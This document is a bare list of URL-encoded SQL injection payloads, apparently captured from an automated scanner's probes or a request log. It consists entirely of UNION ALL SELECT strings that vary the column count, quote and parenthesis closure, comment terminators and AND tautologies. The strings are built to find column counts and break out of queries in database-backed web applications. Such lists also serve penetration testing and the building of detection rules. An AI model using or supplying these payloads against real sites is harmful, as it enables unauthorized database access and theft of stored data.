1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -9430%29%20UNION%20ALL%20SELECT%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212%2C%203212--%20 -9257%29%20UNION%20ALL%20SELECT%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632--%20 -1415%29%20UNION%20ALL%20SELECT%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261%2C%201261--%20 -1781%29%20UNION%20ALL%20SELECT%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675--%20 -9663%29%20UNION%20ALL%20SELECT%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146--%20 -6122%29%20UNION%20ALL%20SELECT%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712--%20 -3370%29%20UNION%20ALL%20SELECT%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401--%20 -3676%29%20UNION%20ALL%20SELECT%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338%2C%206338--%20 -1277%29%20UNION%20ALL%20SELECT%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796%2C%207796--%20 -6128%29%20UNION%20ALL%20SELECT%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783--%20 -1374%27%29%20UNION%20ALL%20SELECT%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514--%20 -8939%27%29%20UNION%20ALL%20SELECT%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588--%20 -9072%27%29%20UNION%20ALL%20SELECT%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455%2C%203455--%20 -6996%27%29%20UNION%20ALL%20SELECT%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579--%20 -9894%27%29%20UNION%20ALL%20SELECT%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940--%20 -7836%27%29%20UNION%20ALL%20SELECT%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235%2C%207235--%20 -5181%27%29%20UNION%20ALL%20SELECT%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255--%20 -5295%27%29%20UNION%20ALL%20SELECT%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403%2C%202403--%20 -4258%27%29%20UNION%20ALL%20SELECT%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056%2C%202056--%20 -7498%27%29%20UNION%20ALL%20SELECT%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074--%20 -1975%27%20UNION%20ALL%20SELECT%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872--%20 -3767%27%20UNION%20ALL%20SELECT%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059%2C%209059--%20 -8113%27%20UNION%20ALL%20SELECT%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523--%20 -2680%27%20UNION%20ALL%20SELECT%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417%2C%206417--%20 -3218%27%20UNION%20ALL%20SELECT%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377%2C%201377--%20 -7348%27%20UNION%20ALL%20SELECT%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465--%20 -1489%27%20UNION%20ALL%20SELECT%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807%2C%207807--%20 -3191%27%20UNION%20ALL%20SELECT%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550%2C%205550--%20 -7614%27%20UNION%20ALL%20SELECT%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055%2C%209055--%20 -6912%27%20UNION%20ALL%20SELECT%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556%2C%203556--%20 -7445%22%20UNION%20ALL%20SELECT%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321%2C%204321--%20 -2868%22%20UNION%20ALL%20SELECT%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705%2C%209705--%20 -5056%22%20UNION%20ALL%20SELECT%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809%2C%204809--%20 -8628%22%20UNION%20ALL%20SELECT%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500%2C%208500--%20 -6585%22%20UNION%20ALL%20SELECT%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148%2C%207148--%20 -9394%22%20UNION%20ALL%20SELECT%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818--%20 -9345%22%20UNION%20ALL%20SELECT%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161%2C%203161--%20 -4017%22%20UNION%20ALL%20SELECT%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986--%20 -5845%22%20UNION%20ALL%20SELECT%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980%2C%203980--%20 -1847%22%20UNION%20ALL%20SELECT%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121%2C%208121--%20 -8085%29%20UNION%20ALL%20SELECT%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420%2C%207420--%20%20AND%20%285608%3D5608 -9232%29%20UNION%20ALL%20SELECT%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295%2C%209295--%20%20AND%20%284617%3D4617 -4412%29%20UNION%20ALL%20SELECT%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644--%20%20AND%20%287336%3D7336 -7735%29%20UNION%20ALL%20SELECT%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948--%20%20AND%20%283271%3D3271 -3150%29%20UNION%20ALL%20SELECT%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210%2C%203210--%20%20AND%20%287097%3D7097 -6834%29%20UNION%20ALL%20SELECT%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003%2C%205003--%20%20AND%20%286731%3D6731 -6313%29%20UNION%20ALL%20SELECT%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588%2C%202588--%20%20AND%20%282552%3D2552 -9779%29%20UNION%20ALL%20SELECT%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207%2C%202207--%20%20AND%20%285399%3D5399 -8542%29%20UNION%20ALL%20SELECT%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786%2C%209786--%20%20AND%20%281425%3D1425 -1004%29%20UNION%20ALL%20SELECT%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754--%20%20AND%20%286664%3D6664 -7281%29%29%20UNION%20ALL%20SELECT%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341%2C%208341--%20%20AND%20%28%281921%3D1921 -1871%29%29%20UNION%20ALL%20SELECT%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234%2C%209234--%20%20AND%20%28%289194%3D9194 -3707%29%29%20UNION%20ALL%20SELECT%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388%2C%203388--%20%20AND%20%28%284344%3D4344 -3678%29%29%20UNION%20ALL%20SELECT%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805%2C%203805--%20%20AND%20%28%283953%3D3953 -4222%29%29%20UNION%20ALL%20SELECT%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108%2C%202108--%20%20AND%20%28%285257%3D5257 -4228%29%29%20UNION%20ALL%20SELECT%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347%2C%202347--%20%20AND%20%28%284237%3D4237 -5328%29%29%20UNION%20ALL%20SELECT%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569%2C%202569--%20%20AND%20%28%282113%3D2113 -5279%29%29%20UNION%20ALL%20SELECT%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037%2C%203037--%20%20AND%20%28%286773%3D6773 